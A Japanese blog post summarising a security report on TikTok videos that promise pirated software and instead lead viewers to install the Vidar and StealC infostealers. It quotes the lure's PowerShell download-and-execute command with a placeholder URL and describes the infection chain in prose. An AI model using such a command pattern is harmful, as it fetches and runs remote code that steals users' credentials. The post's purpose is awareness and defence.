TikTokは、ショート動画をシェアできるスマートフォン向けのサービスで、SNSの1つです。
音楽に合わせて動画を撮影・編集・投稿できる、動画投稿機能と、他のユーザーの動画を閲覧できる機能があります。
特に若年層を中心に人気が高く、世界中で多くのユーザーに利用されています。
多くの人が集まる場所には、健全な人だけでなく様々な人が集まります。
海賊版というものがあります。
海賊版は、法律上の知的財産権を侵害し権利者に無断で、権利を有しない者により販売、配信されるコンテンツです。
これそのものが違法なものなのですが、実際の物理的な形状を持たないソフトウェアなどに関係する場合、その違法性が感じにくくなる部分があるのでしょうか。
海賊版はずっと以前から存在してしまっています。
TikTokと海賊版がつながってしまいました。
TikTok動画で、海賊版を入手する方法が公開されているのです。
次のような流れで進みます。
- 脅威アクターは人気のソフトウェアを選ぶ
脅威アクターは人気のソフトウェアを選びます。
人気の高いもののほうが大きく効果を発揮するということなのでしょう。
Windows OS、Microsoft Office、CapCut、Spotifyなどが選ばれたソフトウェアとして確認されています。 - 脅威アクターは海賊版の入手のための動画を作成する
脅威アクターは海賊版入手方法を説明する動画を作成します。
動画そのものも、動画の中に含まれる音声も、いろいろな面でAIが使われているようです。
良くも悪くもAIは簡単に利用できるようになりましたし、その生成物はよくできています。 - 入手方法動画の内容は同じ
多くの種類の動画が確認されていますが、論理的に内容はどれも同じです。- Windows + Rキーを押す
- 「powershell 」と入力してEnterキーを押します
- コマンドを実行します。
「iex (irm https://どこかのURL/spotify)」
- マルウェアが設置される
TikTok閲覧者の中の海賊版を入手したい人が、動画内容に従ってWindows機を操作します。
操作はそんなに難しくありませんし、手順も短いです。
実行は簡単に開始されます。
実行してしまったコマンドは、海賊版の入手を実現しません。
代わりに手に入ったのは、マルウェアでした。
Windows Defenderの除外リストで配置場所を確保し、そこにVidarやStealCなどのマルウェアを設置します。
そして画面なしで特権を持ったプロセスとして実行し、さらなるモジュールをローカルに設置します。
永続化の手配も実施します。
利用されるC2との通信は正規通信に紛れるように選ばれたものです。
一度感染が開始されてしまえば、その検出は期待しにくいでしょう。
ちょっとした出来心で海賊版を手に入れようとしたら、代わりにマルウェアを設置してしまった、というわけです。
TikTokを使ったソーシャルエンジニアリングという感じに仕上がっていますね。
悪いことはできないものです。
「只より高い物はない」ということなのでしょうね。
TikTok Videos Promise Pirated Apps, Deliver Vidar and StealC Infostealers Instead
https://www.trendmicro.com/en_us/research/25/e/tiktok-videos-infostealers.html
| この記事をシェア |
|
|---|
